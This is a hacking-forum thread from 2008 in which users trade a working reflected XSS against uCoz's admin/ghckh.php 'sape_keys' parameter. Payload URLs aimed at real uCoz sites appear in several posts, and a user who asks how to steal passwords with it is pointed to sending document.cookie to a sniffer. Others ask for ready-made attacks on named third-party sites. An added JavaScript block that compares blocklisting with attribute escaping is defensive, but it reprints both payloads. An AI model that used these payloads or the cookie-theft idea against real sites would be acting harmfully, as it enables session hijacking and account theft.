Ucoz xss

Discussion in 'Vulnerabilities' started by foopi, 28 Dec 2008.

  1. foopi

    foopi Member

    Joined:
    26 Oct 2008
    Messages:
    41
    Likes Received:
    20
    Reputations:
    5
    Here is an XSS I found on uCoz:
    Code:
    [site.ucoz.ru]/admin/ghckh.php?sape_keys=%22%3E%3Cimg%20src=javascript:alert()%3E
    Example:
    Code:
    http://cat.ucoz.ru/admin/ghckh.php?sape_keys=%22%3E%3Cimg%20src=javascript:alert()%3E
     
    14 people like this.
  2. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Yyyyyyy))))
    uCoz got hacked=)))
    Code:
    http://www.ucoz.ru/admin/ghckh.php?sape_keys=%22%3E%3Cimg%20src=javascript:alert()%3E
    :D:D:D
    Well done, have a candy=)
     
  3. foopi

    foopi Member

    Not true, everything works)
     
  4. DVD_RW

    DVD_RW Banned

    Joined:
    27 Apr 2008
    Messages:
    0
    Likes Received:
    202
    Reputations:
    -36
    Doesn't work in FF
     
  5. -m0rgan-

    -m0rgan- Elder - Старейшина

    All good in Opera!
     
  6. k0lbasa

    k0lbasa Elder - Старейшина

    Joined:
    25 May 2008
    Messages:
    189
    Likes Received:
    131
    Reputations:
    -9
    I hope you didn't forget to remove the space, DVD_RW?)
     
    1 person likes this.
  7. DVD_RW

    DVD_RW Banned

    Yep.. works under IE6... doesn't want to under FF ^_^
     
  8. m0sk

    m0sk Member

    Joined:
    27 Oct 2008
    Messages:
    28
    Likes Received:
    7
    Reputations:
    -4
    Good
     
  9. Xcontrol212

    Xcontrol212 Elder - Старейшина

    Joined:
    13 Feb 2008
    Messages:
    253
    Likes Received:
    110
    Reputations:
    7
    Doesn't work in FF; works on IE 5 and Opera 9.62!
     
  10. none222

    none222 Guest

    Reputations:
    0
    .................../>  フ.....................
         |  _  _|
         /`ミ _x 彡
         /      |
        /  ヽ   ノ
     / ̄|   | | |
     | ( ̄ヽ__ヽ_)_)
     \二つ
     
    #10 none222, 29 Dec 2008
    Last edited by a moderator: 6 Nov 2020
  11. Sasuke-kun

    Sasuke-kun New Member

    Joined:
    9 Jul 2008
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    No longer works =(
     
  12. -m0rgan-

    -m0rgan- Elder - Старейшина

    Sasuke-kun, what's not working for you???)
    Everything works there!!!111oneoneone
    Just remove the spaces :D:D:D
     
  13. Arigona

    Arigona Banned

    Joined:
    9 Dec 2008
    Messages:
    99
    Likes Received:
    22
    Reputations:
    -5
    Give an example for the site prostota.ucoz.org, I really want to see it, because I'm looking and it doesn't work(
     
  14. Arigona

    Arigona Banned

    OK, got it. Is there some way to steal a password with it? It will be hard with a sniffer.
     
  15. -m0rgan-

    -m0rgan- Elder - Старейшина

    Try this:
    alert(sniffer address+document.cookie)
     
  16. Chrome~

    Chrome~ Elder - Старейшина

    Joined:
    13 Dec 2008
    Messages:
    936
    Likes Received:
    162
    Reputations:
    27
    It's real. Credit to the author.
     
  17. Sasuke-kun

    Sasuke-kun New Member

    Hmm.. it doesn't work for me. Can you give a ready-made example, say for the site naruto-fan.ru? It's on uCoz.
     
  18. Chrome~

    Chrome~ Elder - Старейшина

    For Mozilla Firefox, Opera and some other browsers, the following construct works successfully:

    Code:
    http://cat.ucoz.ru/admin/ghckh.php?sape_keys="><img src="a"onerror=alert("XSS")>
     
    #18 Chrome~, 29 Dec 2008
    Last edited: 29 Dec 2008
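
The thread reports two different values for the same `sape_keys` parameter, one relying on a `javascript:` image URL and one on an `onerror` handler, so filtering a single string does not close the hole. The block below is an added example, not part of the thread and not uCoz's code: it compares a blocklist with attribute encoding on both values, assuming (hypothetically) that the parameter is reflected into a double-quoted attribute by a template like `render`.

```javascript
// Added example: a constructed model, not uCoz's server code.
// Assumption: sape_keys is echoed into a double-quoted attribute value.
const SAMPLES = {
  // Values from the thread (first one percent-decoded, as the server sees it).
  post1: decodeURIComponent('%22%3E%3Cimg%20src=javascript:alert()%3E'),
  post18: '"><img src="a"onerror=alert("XSS")>',
};

// Hypothetical template standing in for the vulnerable page.
function render(value) {
  return `<input name="sape_keys" value="${value}">`;
}

// Tempting but incomplete fix: strip the one scheme seen in the first report.
function blocklist(value) {
  return value.replace(/javascript:/gi, '');
}

// Context-appropriate fix: encode every character that can end the attribute
// value or open a tag. '&' goes first so entities are not double-processed.
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// The template emits exactly one tag; any further '<' means the value
// left the attribute and became markup.
function injectsMarkup(html) {
  return (html.match(/</g) || []).length > 1;
}

// One row per sample: does each handling still let markup through?
function report() {
  return Object.entries(SAMPLES).map(([name, value]) => ({
    name,
    raw: injectsMarkup(render(value)),
    blocklisted: injectsMarkup(render(blocklist(value))),
    escaped: injectsMarkup(render(escapeAttr(value))),
  }));
}

console.table(report());
```

The blocklist leaves the post #18 value byte-for-byte unchanged, which is why output encoding at the point of reflection is the fix rather than pattern stripping.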
  19. Alexandr II

    Alexandr II -=ImperatoR=-

    Joined:
    28 Dec 2007
    Messages:
    1,069
    Likes Received:
    671
    Reputations:
    87
    Everything works, and works fine ;) You've earned a +
     
  20. geforse

    geforse Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    617
    Likes Received:
    290
    Reputations:
    1
    Has it already been closed?(